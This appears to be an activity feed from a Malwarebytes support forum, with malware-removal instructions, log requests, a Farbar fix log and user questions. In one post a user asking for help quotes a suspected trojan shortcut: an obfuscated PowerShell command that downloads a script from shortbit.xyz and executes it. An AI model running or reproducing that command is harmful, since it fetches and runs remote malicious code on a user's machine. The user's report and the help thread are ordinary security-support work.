Jump to content

All Activity

This stream auto-updates     

  1. Past hour
  2. Ok, I'm ready with the new scan, here are the two files FRST64 threw. I will be attentive. Addition.txt FRST.txt
  3. Yesterday
  4. Most users for the past several years have used cleverbridge to make the purchase. For those users you can cancel by following the directions here How do I cancel my subscription? https://support.cleverbridge.com/hc/en-us/articles/204345588-How-do-I-cancel-my-subscription-
  5. Restart the computer one more time. Then run the following again and attach back both new logs Please download Farbar Recovery Scan Tool and save it to your desktop. Note: You need to run the version compatible with your system. You can check here if you're not sure if your computer is 32-bit or 64-bit Double-click to run it. When the tool opens click Yes to disclaimer. Press Scan button. It will make a log (FRST.txt) in the same directory the tool is run. Please attach it to your reply. The first time the tool is run, it also makes another log (Addition.txt). Please attach it to your reply as well.
  6. Well, it took me a while to install the updates but I finally did it. I have not observed strange behaviors in the computer that could be associated with an infection, however, I think that before all this I did not distinguish them either, I just realized due to the warnings from Norton, so I can not say for sure that the threat is no longer. What comes? Thanks again.
  7. yipes....... Ditto ....Scan with Malwarebytes missing in File Explorer
  8. RE: Post #11 from 1/21/'19 One old bug still recurring... Prior to an in situ upgrade, Context Menu item "Scan with Malwarebytes" was enabled and present. After the version upgrade, Context Menu item "Scan with Malwarebytes" was enabled but was NOT present. Had to toggle the setting for the Context Menu [ Disable and then Enable ] for it to again be present.
  9. Hi, My name is Maurice. I will be helping and guiding you, going forward. We need to get information from this machine in order to have the proper detail to help you forward. NOTE: The tools and the information obtained is safe and not harmful to your privacy or your computer, please allow the programs to run if blocked by your system. Download Malwarebytes Support Tool Once the file is downloaded, open your Downloads folder/location of the downloaded file Double-click mb-support- to run the report You may be prompted by User Account Control (UAC) to allow changes to be made to your computer. Click Yes to consent. Place a checkmark next to Accept License Agreement and click Next You will be presented with a page stating, "Get Started!" Do NOT use the button “Start repair” ! Click the Advanced tab on the left column Click the Gather Logs button A progress bar will appear and the program will proceed with getting logs from your computer Upon completion, click a file named mbst-grab-results.zip will be saved to your Desktop. Click OK Please attach the ZIP file in your next reply. Thank you.
  10. Auto install, all fine no problems.
  11. I think the person in the other post was advised to ask for a system check.
  12. I have a shortcut launcher on my desktop I think it is a virus or trojan. Target properties are as follows: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy UnRestricted -Windo 1 $ag=[string][char[]]@(0x69,0x65,0x58) -replace ' ','';sal s $ag;$nq=((New-Object Net.WebClient)).DownloadString('http://shortbit.xyz/psp');s $nq I saw a previous post indicating it was a trojan. I followed the advice there and did a full scan, how can I tell if the trojan is active.
  13. If you want to manually install the 1903 update you can do it directly from the website https://www.microsoft.com/en-us/software-download/windows10 and click on Update Now You can also download the Media Creation tool, which will give you the choice to either install it now, or create a bootable media. In your case I would chose option 1 above, this way you can see the progress.
  14. You're quite welcome @Mike43 I'll go ahead and leave you with some further information to help keep your computer clean going forward. Let's get real. If you're not backing up your data and you're still using Google Chrome then you're just not serious about Privacy, Safety, and protecting your data. Malwarebytes is a fantastic program but you still need to back up your data and you still need to block scripts and Ads in your browser. If you're still using Google Chrome I would highly suggest you consider using Firefox instead. For more advanced users you might consider installing NoScript as well (it does have a higher learning curve though) Help Secure your browsers Please install uBlock Origin for your browsers to better protect your system FireFox, Chrome, Opera , Safari, Microsoft Edge AdBlock for Internet Explorer How to use uBlock Origin to protect your online privacy and security | uBlock Origin tutorial 2018 This video tutorial above explains how to use uBlock Origin in advanced user mode and all the advanced settings to protect your online privacy and help prevent unwanted sites from changing your browser settings Browser push notifications: a feature asking to be abused HTTPS Everywhere NOTHING TO HIDE documentary Review your email and Office choices Quit Gmail for free encrypted email - Tutanota Why ProtonMail Is More Secure Than Gmail LibreOffice - Free and open source office suite Use Password Management software Bitwarden KeePass Password Safe Encrypted Instant Messenger and Voice Calls Riot Signal Wickr Me Follow-up Reading Everything you need to know about cybercrime 10 easy ways to prevent malware infection Keep your data backed up Thank you for choosing Malwarebytes as your preferred security protection software and tell your friends and family too. We're here to help. I'll go ahead and close your topic soon, but if you do find you need further assistance please let us know and we can reopen your topic, or you can create a new one. Have a great weekend Ron
  15. Understood, Please contact our support team at https://support.malwarebytes.com/community/consumer/pages/contact-us to get help Ron
  16. WOW, that is what we call a fast response. First I want to thank you for the fast, precise, and easy to comprehend explication. 1 more thumbs up for MalwareByte. I have followed your suggestion and removed the extension, did a new scan with malwarebyte and everything seem to be alright Again thank you for your help
  17. @jdemoccc There is a one-click MBES -> MBEP migration tool coming soon but it is not yet ready.
  18. After running FRST the results are unchanged -- can't start mbam.exe with normal Windows boot but mbam.exe runs and scans OK if boot to safe mode + networking. With normal Windows boot I tried disabling all protections in my ESET security but no change. Below is the info from Fixlog.txt. ================================================================================================= Fix result of Farbar Recovery Scan Tool (x64) Version: 19-06-2019 Ran by dculp (20-06-2019 14:30:52) Run:3 Running from C:\FRST_Farbar Loaded Profiles: dculp (Available Profiles: dculp) Boot Mode: Normal ============================================== fixlist content: ***************** CreateRestorePoint: EmptyTemp: CloseProcesses: HKLM\...\Winlogon: [Shell] explorer.exe [2871808 2012-11-30] (Microsoft Windows -> Microsoft Corporation) HKLM-x32\...\Winlogon: [Shell] explorer.exe [2871808 2012-11-30] (Microsoft Windows -> Microsoft Corporation) SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = Toolbar: HKLM - No Name - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - No File CHR StartupUrls: Default -> "hxxp://www.google.com/ig/redirectdomain?brand=CKMB&bmod=CKMB" CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - D:\Program files\Avast\WebRep\Chrome\aswWebRepChrome.crx <not found> CustomCLSID: HKU\S-1-5-21-1750345208-380253357-1962161537-1000_Classes\CLSID\{004B49B7-11B9-5058-AA22-08DD0A3ADC4B}\InprocServer32 -> {1F2776C4-9468-D082-92E6-56EE85889A47} => No File CustomCLSID: HKU\S-1-5-21-1750345208-380253357-1962161537-1000_Classes\CLSID\{004B49B7-11B9-5058-FF22-08DD093ADC4B}\InprocServer32 -> {1FBB964C-9468-D082-1A06-CAEE85889A47} => No File CustomCLSID: HKU\S-1-5-21-1750345208-380253357-1962161537-1000_Classes\CLSID\{DD0822AA-3A0A-4BDC-B749-4B00B9115850}\InprocServer32 -> {504A8032-9468-D082-6410-3BA185889A47} => No File CustomCLSID: HKU\S-1-5-21-1750345208-380253357-1962161537-1000_Classes\CLSID\{DD0822FF-3A09-4BDC-B749-4B00B9115850}\InprocServer32 -> {504A996F-9468-D082-3909-3BA185889A47} => No File ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Computer Aided Resonator Design (CARD).lnk -> F:\Temp2\CARD-14.31\CARD.BAT (No File) ***************** Restore point was successfully created. Processes closed successfully. HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell => value restored successfully HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell => value restored successfully HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => not found HKLM\Software\Classes\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => not found HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => not found HKLM\Software\Wow6432Node\Classes\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => not found "HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\\{318A227B-5E9F-45bd-8999-7F8F10CA4CF5}" => not found HKLM\Software\Classes\CLSID\{318A227B-5E9F-45bd-8999-7F8F10CA4CF5} => not found "Chrome StartupUrls" => not found HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\gomekmidlodglbbmalcneegieacbdmki => not found HKU\S-1-5-21-1750345208-380253357-1962161537-1000_Classes\CLSID\{004B49B7-11B9-5058-AA22-08DD0A3ADC4B} => not found HKU\S-1-5-21-1750345208-380253357-1962161537-1000_Classes\CLSID\{004B49B7-11B9-5058-FF22-08DD093ADC4B} => not found HKU\S-1-5-21-1750345208-380253357-1962161537-1000_Classes\CLSID\{DD0822AA-3A0A-4BDC-B749-4B00B9115850} => not found HKU\S-1-5-21-1750345208-380253357-1962161537-1000_Classes\CLSID\{DD0822FF-3A09-4BDC-B749-4B00B9115850} => not found HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00asw => not found HKLM\Software\Classes\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => not found HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast => not found HKLM\Software\Classes\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => not found "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Computer Aided Resonator Design (CARD).lnk" => not found =========== EmptyTemp: ========== BITS transfer queue => 8388608 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 7772488 B Java, Flash, Steam htmlcache => 1088 B Windows/system/drivers => 12690 B Edge => 0 B Chrome => 0 B Firefox => 0 B Opera => 0 B Temp, IE cache, history, cookies, recent: Users => 0 B Default => 0 B Public => 0 B ProgramData => 0 B systemprofile => 128 B systemprofile32 => 0 B LocalService => 0 B NetworkService => 2494 B dculp => 145481436 B RecycleBin => 0 B EmptyTemp: => 154.2 MB temporary data Removed. ================================ The system needed a reboot. ==== End of Fixlog 14:33:21 ====
  19. I quite well agree that direct contact would be optimal, and would help avoid any problems in relaying information, and who knows, maybe talking to one of your people would get him off that dang McAffee and also on to MWB... I fear that trying to convince him to make a general post is not going to be met with much success. May i ask by what means i could have him contact your help-desk? Every time i have done so (and there have been more than several) it has been through a link within MWB-
  20. It restarted, should I open its file location and run it again?
  21. @sfrush way too soon to even guess. It ( ) [ or its successor ] has to be in a test period & then without any show stoppers outstanding. At least 7 to 10 days from now. If it is released, there will be an annoucenment at the very top of this sub-forum. Also, if your pc is running the Beta, it will automatically get notice of the release & the update.
  22. Okay, please see if Malwarebytes will run now and run the following 3 steps again. Please run the following steps and post back the logs as an attachment when ready. STEP 01 If you're already running Malwarebytes 3 then open Malwarebytes and check for updates. Then click on the Scan tab and select Threat Scan and click on Start Scan button. If you don't have Malwarebytes 3 installed yet please download it from here and install it. Once installed then open Malwarebytes and check for updates. Then click on the Scan tab and select Threat Scan and click on Start Scan button. Once the scan is completed click on the Export Summary button and save the file as a Text file to your desktop or other location you can find, and attach that log on your next reply. If Malwarebytes won't run then please skip to the next step and let me know on your next reply. STEP 02 Please download AdwCleaner by Malwarebytes and save the file to your Desktop. Right-click on the program and select Run as Administrator to start the tool. Accept the Terms of use. Wait until the database is updated. Click Scan Now. When finished, please click Clean & Repair. Your PC should reboot now if any items were found. After reboot, a log file will be opened. Copy its content into your next reply. RESTART THE COMPUTER Before running Step 3 STEP 03 Please download the Farbar Recovery Scan Tool and save it to your desktop. Note: You need to run the version compatible with your system. You can check here if you're not sure if your computer is 32-bit or 64-bit Double-click to run it. When the tool opens, click Yes to disclaimer. Press the Scan button. It will make a log (FRST.txt) in the same directory the tool is run. Please attach it to your reply. The first time the tool is run, it also makes another log (Addition.txt). If you've, run the tool before you need to place a check mark here. Please attach the Additions.txt log to your reply as well. Thanks Ron
  1. Load more activity
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.